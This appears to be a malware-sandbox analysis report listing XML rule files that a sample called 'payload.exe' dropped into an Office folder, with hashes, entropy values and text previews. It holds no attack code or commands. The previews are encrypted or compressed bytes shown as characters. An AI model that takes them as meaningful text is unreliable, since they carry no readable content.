                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.943298403597496
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:J8ONMg4/jIqq7BKBlPs7+zRVvCKhFxXFEXBZPlUdZHcB8KZUbyC3swD:JTNTWIqQKLU7gRFCKh7XFEXBZPivHcBI
                                                                                                      MD5:31575736FA0D323883676BBD467F3F08
                                                                                                      SHA1:709157C78B2160843E36778EE8AB8E2FCA53822D
                                                                                                      SHA-256:45C106B9177B6028D027AAD44EF52272ECD3D962323B7C76A4208DE6F9D490BB
                                                                                                      SHA-512:7FE4A7B8363EC993438F634E67CE7A28F5FC895210D3F4E6CE0374669590FA16E688980A6F6DF9AF181306C8901B12BBF25C52F54823CC65F93D12273985CCF7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..o.G...*.VQ...2.D..Ng.../.v#..fg.9.....E....7..F.........=..l....t..X..........o.8...GH..XhV..#L..o.....2..).|..O.)83*k.Ar.XTE......t.f-0.R>...4...p...<.+..v.h..~.....-W*C".5/.!T..o.`.T>5...........d.P.j.Ga#..yR.xp.1.d.!.....x+.....4t0...NhV...6..*!.N.5.[...h]. M..?C.At...e#.Q.5....D..c:......N=..?.V.....[.i^..e";.#.c..G.F.....w..._r...X.V......k..........:..h.?...!i.1.5...w....8.=..+7..../...@...\h.I...=$J.....U.b...'.......K.~2c.W..x{u.{..d....s.c...3..k_....V.a.)U<......'..<<....>.%:...dn.(._.,..)B|.Q.......+Y.q.u..,.Z.QQF..%... f......{LA...5..2....>.n.+>~...z.....H....1.&b.M./..8.ETJ_...!YD4.n>I.....A.yD.l?..92...X...GD..d....D1....>.......I5SQ......G..D..74*.n...{|8.!......KM...U...|...e..Z..5.0.UD..W..W.....c...2.8.Q.U..tQU..2v.4J.G.%>i..H.6...:;.....?.?.....p....p...(.W...X..]..c..i..w.....?...c.~A.......G.>......]=N.h`.f........i.n..........g...6....`-b..`..-3.M..[.a^:.g./.}.:..;.u............(.&f.".....u%.N.y...arXkk

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10802v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.935464654121662
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:jxM44BcNlK5EFsJdHpFFjo4m3xBy6Gu/CfMBIJGvaeZCZHfbPm2wD:jmj8K8k7iBpqfMiJzteb
                                                                                                      MD5:EDBB31B5774A01C749587B48A837D258
                                                                                                      SHA1:AE6DBB7CD24E1646E9337D5D81A0F40F7B284BBD
                                                                                                      SHA-256:BBF936D97A518F0BECEB618FEBE2C255B90DE97F629CECC5A7903CB511EDCD69
                                                                                                      SHA-512:4A386682D9D3178FBB241D0CC517466A3267188AF097F5D20034E9B126A9CB57DF28DE55C84F7B76B023AE65DF51A7AB415ECF1C0425D832E5993032E6311A50
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..JeR....?..P4 ..s_.Ix.<.9<4....-n..]..8..B...u.P.....c...0A.......Ma..hW2W:~T..u*.....R{A.;.k...8Y..`B..8X1tJ..{.!.v...|.....B.....i.YG..}.....s&...EM$@..Kd..0....@2./.oh/..4E..M.d....*....mE-...wz...Q....R....X.x..D.w.O.@...Y*UI......x\5.UC.n.NHC..p.W.._....q/...l.u.....<../H...p.O..O...h...JKIF.......D*h.PV...G.x..F...?.pb.d5w.6.>....l....#.(O.....o..Y!\"....T..5E..z.p..7...*ue.4.O...+.iF....."......z...:.%=.....|n.z.\......WM.r..xcz~..]..v.|<.D..'QZPL.q.d.E..pO.EK.~..K.U......4..7..5-.\1y.>R...8K....r.4..#.c..6o...<.D.!'......Y*..\.k;SE.h.M...Z..4.c.cL.@A^[u..Tr...+.......A.........\|D....z{...}..O..;w..3Yg.M.Tl]...\..u....$q"4..*..=..x.@....i.&t.H...X....y...?...eD..Q............\I> ..gpP.c.Q/.....~p..;-m...89..@...8Y......3P.Gx.......EY$..G....r.F|......}...M...v.G...$.~....@r.w|.Y.2.I3$U.M..NEIU....7.Yj....T.j...$..0`....E.....v.JmD3l.....F.G.8:u.+.@....Ad....Sl...i.6..>.@.. J...j..Ld..A1p..$...m../..R9..AT&..s.,..SM...2=..s|._#Fw.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10803v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4639
                                                                                                      Entropy (8bit):7.959168046960122
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:Clxd9AedoXM/M+EMfhRURTNrvdPYG5O8D018jX750LD90h8wTe/tTxOV:CVKVXM0shmLaCO4L0tg8N/tTS
                                                                                                      MD5:93E2153AC7F581CE26A7874E0E72EF5F
                                                                                                      SHA1:130B31D758DF680F3806DA3AC323F1F416AF1EA4
                                                                                                      SHA-256:99E9183934A5C77A3872FFFDCCBDF77C588D3EFB91B7F6EE47624C01392FDE5D
                                                                                                      SHA-512:5DBEE48533223913BDD9FAFE5327DC721F435626C287978D830B790FE56E5C04AE87D07E14BAEECA35EB2D9DDAD7C383790185FA93C44290C5DDAF0CBD4F819E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..J.L=jV......VK.k.Udw.J-......Y-...>...;..Z..........=.xW.\k.<.j.$|....T.....9V.......01?.7Zd@.....U.@.......-..%.>.i..?......,s..m...`hW3qc4..L.J.U|.E...#......9t.N.p.v.}..P..oj.....z......d-.JO..5.H.w..oJ...S3.c.].v.I...'w...{b..$.S......!..>...y.3.$..B.....2..N..6......CC.j#..B.?....i.....E4.~...y.nD....~.<..Z..s.8....VR.s.dVP..{.6..d..L..0.....g.~=Z.A.|t.x.0.Y._.!Q.&b.%.f0..[..\rv.RV;...=..>.Q.<....v=......+....."9IJ.W....{..Z*...mi!.P(~.}.*s..F+BILP0k'.".'....3@ 2U[.b_....w$3qFC..bm...eWL..N>.V^..`A../....pB..^X..<$ai. .....".m.{,.}..w.K{...........=..s.4r....{....I-...V:.i.......z..%}.:k}..nK@...s.L.;;..P.K.d.9.$.p.R.\8s.......i.O..R.......?v5.#a/t.......S".w..|6B...x.]|nXu..Y..]S.......P..Z1..m.q.?6..$..)...KA....o..R....,...L..._1....i}).......ai.'........N+.......rO.'c...x..^|..<._.<.os....f...vq^,.y.n...l..|..h.~X...qYR..efQ-.....xdk.......$..>_....1D...... ".2%.$...%..y.'..g.fn...S7G.Q....M..du..%...<...vo.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10807v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1329
                                                                                                      Entropy (8bit):7.842000002727398
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:GqhOlks5qGRrQz/q135qqmSUK4JgD9Sa9WY0cDq/8CQv6bD:G0OlNQGRrQOXqqm5KSgciHqvQwD
                                                                                                      MD5:6710FBFE35C4ACF0D785CB6AD7A34908
                                                                                                      SHA1:F47665BFF97864D72DB44FC33D1F72D08DC3C276
                                                                                                      SHA-256:BEC56994175A0730705C810EF3FB1DB240848BA3A8F66C3BDACC8BA489CF40B9
                                                                                                      SHA-512:A313522693990264E938876B48D5A412D857D6A7524584BB71A727884297F6F72ACDD10B15DDE7654353FE04C22501BD7032BD165DBB36F196A95CB4C34CF2EA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....l.n.Oh.....F...."....#.2..h..2%N........l.tBv#rr.4({..oFf/.2...5>C%.'A..q..?.?.wH.........a.a._.".Y|..}L..5.x....%p. Va........&o..B8.;-......t....0!..=.`..#..T.........)...D.U.[X}.,..?..6..\..._..cc.c.P.......^.:.s..?.....eB..k.....c-.<Lz...c.....?y.3..\.C....h..V..b..._....hX}Y..b.<.*o:d..@........_aV....t.H.U}.|.k.3HA.2..i..f.{.k.M.A \F._..P.o..|..T]&Q]..r...[1.........i..y...>.s`...h.R..I...04.5...\..*.s..^...#.../.(......(..........%.Bc=..Q']<A.....?d.P..^.W.tC.m......<vr[I.#...//.b.......J....3.#0.Q..A.Y. ZQ.R{.>.v%.5GF..V......z*..N.q......H..r...$..i........8:..J.......Uqr.Y..fTf...L.....6...^.$......U#KT{..C....8...F....%...d......._.4=.]+}....k0....'..U..HP....(..7kb.X.{.G..*..b+l....2u..u.....5K.Ya)...Gm1..n;.T.....+2N..|v6I...$v PzL.3:t...\.W`...[.......I....#Dr<.@b.C*....j....Z...t1d......n...'+4.....b.c.)[=........^/..`@.....l.7..A<WvE^M;C...i..I]W-...pV...L..1..n.2J....y...5..q.a...R1..6.[^]{m.?...IW.h.r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10808v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1395
                                                                                                      Entropy (8bit):7.843369887242304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:SFcoJStwP2OYsC+caUr5s9hayxtASBxljgqGjsyAHWkSbuO8aG88cAZpfROAnv6X:OZgPTHrqHpbv6qGjq2LbuEhmtROAnwD
                                                                                                      MD5:6A15D1566952B717F2B02AEF4595859B
                                                                                                      SHA1:F58AA2228C75EF5F406675BDFDCB8A512B84F1D7
                                                                                                      SHA-256:C337867E42193B22325BE672CD26E9ADAF4DFD07E112734D6721B5291D31BAFF
                                                                                                      SHA-512:60DFE98A3C5AD80F7D75B8CBFBF42523D44645E35B4CCA4F75E3DA680F4CD6CD319854717A622E1D94AF8C3ABA77D33FCEB1AB174C615C9C18236642A5CBDDB9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlb...'...sc.,D.*...|.;.3-..:.?=n...E...8P....].......8....._wG...4[..@...LK.(9....b>qt].....U..=..+..J.K.$.........@.}+...cIH&.\Z....m...i;..P8....._...}.A.c....?.CTK.i..Ek..3B......'cD..p..!=...~r..m..7...Y.#B]>...D...........S.d..6!.R|:(:..TF$..p.W6g..\.<H.[{~9"Z.La..6.W....p}..w..k.W2...tC.~D^.\..O..z.j..~..!1.G. ......GG.l...R.o.TN...y.8.-Q....Q...s.n.S.......'.4....N..S..O..`:cK...bu....}?W........EQ..+.yt..w..A..'..M.9.b.....H.&...GF.......@{..tq.g.7^..xk.U....@.......|.P.}.b.uDt.|4.H.;}.u..6.sK.b...A}...p.....".e.Z.......%...Tx....n.K.[;#.kJ.9V...M! ..Z.d.>.@.h..Qc.U8Aws...[.+E..K. .r.-gC.u...~...$z..d.....<$k...T.Eo8nc..B*.=>..p.....b...7....S7Oc.Zn]5G).l.x...,...q..yr....R..?..i..}...w]<E_...MP.T.....](7DS..A\m.Pn..J.w.0............M...../;h.."OK.@.i..S..F...;a.....E#.&9)Et.R...]...C.Po..!L........_T..S...8.Er........4.....d...xX...Q.7.4.x.L"Y....]i.&...y.xQ.........jJ...2zt..j...x..l<...y!....T0S.O.Y......y......f.4.f

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10818v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1124
                                                                                                      Entropy (8bit):7.815068172883922
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TSoziPzYIQjx17aTlXaU+pQ3a8Y2mwtDA6TNya9VmWX9jv6bD:GoiP0iMpQ3aYtDA6TI4IWXZwD
                                                                                                      MD5:49D0228AF6CCE9ABCA6E65CF5B33C793
                                                                                                      SHA1:A80D5EE7E112BD812262FC1F718C03F8817127D2
                                                                                                      SHA-256:46D24C0E5572B238F81B858BF91660C5C96E32ED966A2ADE387077F44AE189C4
                                                                                                      SHA-512:B00213F342EA5975CD60F9D5A03E66A2B9AA1CA439A413BC203CD45AAD302A997F12923222BB248F79A45E008853E118D2B0C8813CAC64B486275D6E7C66B8EA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlq...|..N{.....C...nN.....z.Lv.v..7Hw^.G2..ds6..........X...R.VB.N.z.d"\.|..s.P...{zD..].........A...."./.@.....t....(.QW0......]....@O.OC<7...@......T...(......./......,......>..j.`....!..4.f.u>P...a...MZ...]g.>.-.8.....X".......V........h......*v.~.,\.s..UN..Y.A...o.....T....Ty]...|.%.........XX...X..|.h..8M.^.P..y.G<.k.dl..W.:.o:.0.*.r....5o.xk.*.l...e)..1.I' ......t..q[.N].ERea..0...D..(.Z.]...Z.....fk.G..`0f......5. .<}r6#..U..7.J..$.p.c.Xh..-(......L.V`.]..nU..Z...=.....w........_......H.+..Y.....\..p..VK0..c.z.,m.6.jEpJ.VM..<...pm~.E..Zr.\.DC.....w!uw..KdQ..C._..._..q.T.]._g.6...9.VPn.#+t&pK..k..c....r..xt'....|..N.lP:.L..C..4.3.....K75m....t.t9.....7...w.....k.C9r..].c.h..kxc<n\S<.s(..}....f[..]. X.f{l.].t..Eb.^..^.v........e.q.xI..p)<..`..0.V4..fF(...v.S..H#.....`..C.M[l........zf6.0.Oi..k`<..+...-H...6.!...9opm... ./.*..k0\..y.W-.ZQ7.....`..p...~..w.-Q...S.4.'.,.^.........dR.=.bf.*....:.....7'.h.....4.Q..2

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10819v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8769
                                                                                                      Entropy (8bit):7.9812745827422775
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:FiSUoq2LIypVENhh59W8fS4P53y6MTMFMe:Fe9s7ohY8fPP5bMTkp
                                                                                                      MD5:F7828A9037946F9E51F71F64F6D8F385
                                                                                                      SHA1:B0EF58701A2EE4E51BAFB2CE42C0FA8A7644E5AE
                                                                                                      SHA-256:B143BBC657BE89FBA49CAB6C21A878C3AAFAEF8A2B26288E5E3029F7019256E3
                                                                                                      SHA-512:93470C5F469A0EBFF22376253DC8978538987EB656163DB7CFFC4B975BF2D642106BB5E20286C0A73FF5E8ED218DBDA56D751C4309DE911A2C5F734D9F792508
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlSG......l........amx..?....f}.b..S).1.....8..l..-*2.iK.<....v}rx..(.R1.'...2^...'\u%.&.g..Zq..ht..7\.i....X..L..*.g.."..&...[.-.-.(H._.}.....'.....?.X......................x..y.......1..xSz......$S..\...%.za...^z..~.?.l.4..p.........$o.8..h0...X....U_..x_..6i....D.-.Fh.$.#....B.%\/:.t..N..Z{m...........H.&...$.O.. ?.#..........{....}..i .F..n...i...H....T.Y....&XBy.Lk../..0.:u.H.P...(&....%.C..yQ..\.j...x&9..F...,K...l.!rh..?Pu...0.&.6x.&o.z.B.&.!TQBK....{..3.hz...f.......}.(.xT+....U.d...8...........,Do..m|...d..G..T...P..o.I...%L.\.I3...SW..>.FB..y<..../..@6..d....*|.t}.;9...o..D.y...3f.j.^.l...<E...x..f.....zt/....v..?.9..SX=...d....H.D......OW.....C....<`2../3....r..C.V12.+.q.\0Dk.j..6o...It.R'~..1....Q...k].N.-0w.......s".+T.}....."...kf..h......9....L?..).c>.hj.b...Q'T..C>aw..+...Dn;..e.XZ.x.v|..w.B......x.I=.. Ue.n.h.~.../...R.IN)......>.#A..q..K...kHLyu..s.z,.+...?..|..I..P$.1...(...)..C........(.....V..L).....!......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10820v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5842
                                                                                                      Entropy (8bit):7.963065302284719
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:e6RHeFegsg5H7oRhcXvP1Bbtk5jWQ8WWxsGn5lJkv+2f3JDm1ity:e63gssT9Bm5Crdxbn/Sv+w3kity
                                                                                                      MD5:F2C4F8F5F4B74728CA7C96ED09E4AC6D
                                                                                                      SHA1:8E18261DE50C9D66A1F0F018A289FABF95DF8D8A
                                                                                                      SHA-256:BC8079F5005DD4C2689A6EB75BC4D48034846C73F66E37160CF9EC8E6DFD5411
                                                                                                      SHA-512:5C591A0886480DF2E1C62A98CD0C9556CCE23C09101F5A6420B999E42E4ADEE442198A86C3768F9818D461C9142CBF6991856AF5F8487A9AA5FB6A866D509F3A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....F..3..sisN.".,)..=....g..}...:..,.}0A'...l.Hx.)?..rwN/.FtUZB.x..._.j[.1...&..0...u...v..d......>....).$O.~....r. |/...m$.0....r..G..id.l.T-.e....O5..G.....d..;...;.....]..F.|'p...M.".&".....2.P..9.-....3.f.d....$.v'`f....n} ..y.....6.HD..c.......{...!.6...*...x.E..B..q.G.+..%o..-..F%}.a.....pM<..[D.0.E..a.....+eM....p3W..'..;..:.....5...b.+..a..;Y9.ag......-....sh...4.2..v)!G...^h..w...Pd.T=.0U#.5.t. .x.f.0 .d..;6...,.{n.Z.....f`...s.Q(d..F.s...[......1.....G.7...B.YV.r.NZ.R.1m.-...7+....o.2...aUH....S3::ku.../...uT.A.....e.;..,..Qi......J.........Y~&H.....hpR]O.:......g.s.M.]..........<..y_S.%..b.....'.gZ=on...p.....b_z.. !|e$..>._2...{.}9..>.\...i/..0....P'/....+....p..A.c....v..HO...Q.[.....d..............o..T....]A.....WR....)v.r.."!.+XV.......NQ.nV...L..l...)%q..n......X'.6.A...Gr.,.e..Rd..BOi.I'9.]...6..q'.^@..!W...+I-...q].m.1...J5Q.g....,....S....._....?k.Z.....c.Q....%..Q....39sM.v../..K<pc..;`.L.%.D!......W.......R.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10821v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4787
                                                                                                      Entropy (8bit):7.961775970690725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:TVMFXF3DmVbdExuZ2Q6NOTbLfT+PrY1uJkIWoDvgb0j4RjpmT5:Bu13GSwz6NkDS8akWvgb0ERjpm1
                                                                                                      MD5:5D8914CFAD485198A84C7FA533F0DD8C
                                                                                                      SHA1:0D759A26E9E55A90EB90C47624E5D4B6E8880404
                                                                                                      SHA-256:D775DC406961A3A7FCDE6105C42FDEDDFCF09FAF65FA2FF554415EABE75AF502
                                                                                                      SHA-512:67462F3E4FABCAC6E5500FA1AB4DD342413CBF5F0C0B5900B56D116BF06370CE1389BE4EB1E29E1A22668E00945E6651B9F8A59006D13EEF72285A05D9BFB8BC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlHQ..V....I.u....K. .6...l..j..>8.d......:>G.v........ ...R.....V\0.|...:..k.s..R.;..W.....>(.R....,.5./:`mp<..t.Z.N0...7.n.].7...........1.FY.B.+.O....U.D......CAw..#$A.[..G.;......!.....!9.Q.n.........k.R..q.!.!.......E...[M...j...d. .+....Q.ln.2~wy.ND.s.p...._<..oLb$.Ax.Jb.....0|G8.I..:9.8.T.t.fYT*x.p.s.b. b..;....y.]...~;-.+.Td..|..}=.9.$....Z.....%*!....U.. .c..]..Y....6.L....p.......!.&.5...e....,...=3...\.b..........H...56.,u...n~O.J.."e..;......y...nJ.l.wV..L..\D.o..Q.......3L..42.#h.Z..I&..b../.O..:......5.}W.......GK.._X..7..7 ..2_.....f.D%+...X....XK.S......#.....z.:..8.u~.[.l..Z..vz.~.._....b(..k.y.s.G........Y.......Z..P..,...A..'...R.B..J...vVi.......'O.&D.*q@...:..$..'.b.Y.\....2(aV.....u....me>..].<..R.....4.........Q;.}.....%...2..}M.G...D..fDOL..U%*.....O..f.l&B...qLQ..R$N..U...6...<.g..N....&I..2.pxy....u....d...s.O.L.Y...e.........W...\..7O.~.a..F'1..r.mS.l.8,.1.uP>.0.6..0.C]..{.2.+o....u.Z...hT.\.....f>G..q

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10822v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4786
                                                                                                      Entropy (8bit):7.960986369072215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:3RlqamEYL1T9OaKjjxmQZXODuR31QY38T4kZRxHv5ciHIGFhC8ea:4bd9v+jxDj1QK8UkdHv5cio+C8ea
                                                                                                      MD5:EB27510C5EC04161C221C8CD206FCCE4
                                                                                                      SHA1:8D47F0E8448A93013FA9E34A8EDF28198433445D
                                                                                                      SHA-256:5E93A87F42D7EA88439C55F59C6C7643E81C7E49BFFCB1C64A57F7A5EFC5A867
                                                                                                      SHA-512:D1C029C543A72D8F3E25ADE5D5C0D2EDC97E1E0D431F0EAD9D8289619AF050F46B7CFD362AD67D053EA49BBB29C9D49E223098D526E87A31EDBE499EB95B312B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...3.p.*..\L......0u.[....e.....m..p..+?h.......]l.$.$....}o..j[ ..9i._....@X..,p {<?...gY~........f<.....t.....SZ;w.?..b...Wf&..SA..$..i..r.{!a/mNv.....pK..vx..k...;...z...u}.Vj...[*3:.V.6".v.......n.6.G...:.U[..iW.(.LYu.,4=.~.....Y.=....`)sC.F..T.#.9d...O..l..T.].*.....t.J..PJMU2.[..L.9\!......RX.#>..S....gw... .fx0..1qN..a.fbRx.9.}.V ..W.s4.......{.l..5{.(.l.K.....1...y......>.'..d...'..............I}.y.....m:....~...9.....6...).$......<.g..c.......C....O..@......lmt"..#).2.FN..G4.b.#...\..0M.V..4.....:..y.T.._$..#.p5.$.x..&c.}..]jp.M...J~F...!..W.......N.o...>..Y.Df............Z..ZN.g...2...ku+.Q...........J@.[.G...v:b.n.p %G........X&o.|...B... t...7l.J.{ji1.<"....=..tD....X....C.p..bC...e..]..<.xF...)......\.......kt...F.M@\....Xf-....-*...+Z".o.#UH..O?yb../..R<...P.........Jt......t?...>.......x..@....YJ._.E..%.>......q../..w..jS't.fM..x?N....`....x.....'..K.%.'.=..B.:.^a.^F6..K&.C....k+n..6...:...0.4I..5.1.`.2h~.RW0....f.{...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10829v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3030
                                                                                                      Entropy (8bit):7.9385701591294
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:oJ8QSPj+MG4dZXb9wU7XpOJS4rrpPgkll40Q/gdZi+Vi8QfShR78FoONbG4wD:oJvSPjdGsZXpO/J4kn40ygdtHQKhR726
                                                                                                      MD5:CF5910C27F7DDA7CAA731E927B8A3AF0
                                                                                                      SHA1:ECD48CD2679CFA0733E1EA5F2048D2F85A9AFF7F
                                                                                                      SHA-256:54515EE6A1C8C1705924F81F556E71F6CDD2F67621EFDD199BF6E2B360D23217
                                                                                                      SHA-512:F3EBEC5C59E122A4421E5829CDB8EEE5CB86C3F1E51406FA4CB6DD7BB0A8CF2AAF75F7AEEC1B879ED88B41CCE3637772631CBD524E64466623FC73F15B730816
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlI..?.!.....U|U.8....e.p\......?.\...........\{.}....3%....d.U.{...9...Z_J...d!_...^.|g.@....c'.....@.w.Y.....).~.N.v.T.{..e.|...[9.!.6.(.7]....p...p...mebH.....H.S.L{ymIQ.....tN0.....^H...A...7//.[.wC?m.WI8-[u.'2.\..`...0w.D{F.nz{.),..4T.r.78.E.?.....%Q...=,1.:...(^J.F%*...@.4..4..a.R.gI.G.........3.v.(^a.9...'e.....83....mJ..G..]....||..v*.x..:yEj....i^....8..`...3...G...%........Z_.3...!..z.....gD..V..A.Al ...ti%..X.LM.1.......H.]o"......F4hn.~%.)-....N..._....p+.n...yD./v.....-.....E4.tW7J.@........b~.7.=oK.'..5.}fp.h...Y\........{...y..H.......w.y..?.|].*.*. ..Q(...`qp..n....e .......p.R....UL.c..(.Z..O@.D..z_....D3V..R6J/.....qx......j...>....z.H..`.Y...S.rU.....v...."...b.Y3...T.....\........*}.{w!.J...-lQsK.......B...M.WY....U".....r.k.)v.=|.:..>.r..D.a(..t....{.9f.gy.mfy......w;...g0%5W.".<N....y.....n.n.qBzzW.1.......4...`.U.g...U..}n7.|[.D....`.R..8..3U...e$...qJ"..d.W..X..(__..D.:............&.{6..W.#...<7......I...6...8.a.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10879v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):789
                                                                                                      Entropy (8bit):7.772335487389758
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yz8xeBdC4KX2t/cXbSkUMaqxcplqdgL8zMv6bD:YG8C4Ozaqy8zMwD
                                                                                                      MD5:F6070DBA8078B996148C45DC067062E5
                                                                                                      SHA1:EDBAA19F0A98A0A74D2F53E3E6A6AB2C8AD365BB
                                                                                                      SHA-256:2C69D517FC148C3123EC4A0B123C000533DE0A738810F08959349A199E7D9D48
                                                                                                      SHA-512:10083773CCB7B73E24EA7C515150DDE3F17519C3CB5C94DAA7A198D8EE894F104571AEC87DA2138341800100A549B2CF9A1862833FA6F19F901575674D7EE111
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.`..AU.g.........*.D.gNS.:`. ..X.R.I..........5.|+..*.....5ie.y.<.Z.r..q.....A...c.9bK.X.......... .'.....&.Q.>....w.q.h..A*p......./...|Q.2*..6s.g...m....>es"B...=......@.v.l..~..{.|D..q..G..!..u:.N..k...m......8..:..R..u.!a3.V.......c.}....1..~g!......\.b.\.~g.~(..]0........./.Pt.n.I..#.HX.\.t.`....t./.&+..P..FQ...^..RK...M..t....OK5..hK?.....l..J..*/....o.w..3..X.._S.ah..?.$....#..z...U...=..\.9.`..7.u..Y.{.:O..n{.w.........*.Q.R.+...00:A..l..B.7f.........=%..)..bF... ...e....gAr..6.8.o.i.....Rj.(.,4.0.f..T.}.c...~.Z.-...m.w......k....BRdFS.(..|.`...w....q._...QL.. a|.9...nl..f..!..M0..... ...=.A .z..k.v_Yt......5y...i/.E.h.u*...L.Q...G....m.^5..fW..}.Ct...p$.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10880v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.9402968868972055
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:jJ86tcvL6dCvqBQwy014uLladK6+Us12FCwKL/dp0WaYEcwm5X6lSbQdTnh/fewD:G6t+gCvqBo0UdK6zsg0wKLz0WaYEfmS3
                                                                                                      MD5:7DFB1723137ED08A228099108EBDB5ED
                                                                                                      SHA1:AACA756A9BDC456728EBF13039A549DC97B4843C
                                                                                                      SHA-256:31C894B8E146FEE4FFF7F30DE7F4250AE89F36E0E19CCDE6153411FA4B95862C
                                                                                                      SHA-512:24C48E356A09F6DC450828E6DD039BE5407FBBEF37FD1510C422D6BE7B3AB64BE37F872D2FDD8518339231C96FF109E50740A60F33771C13FAEF99027BFF4284
                                                                                                      Malicious:false
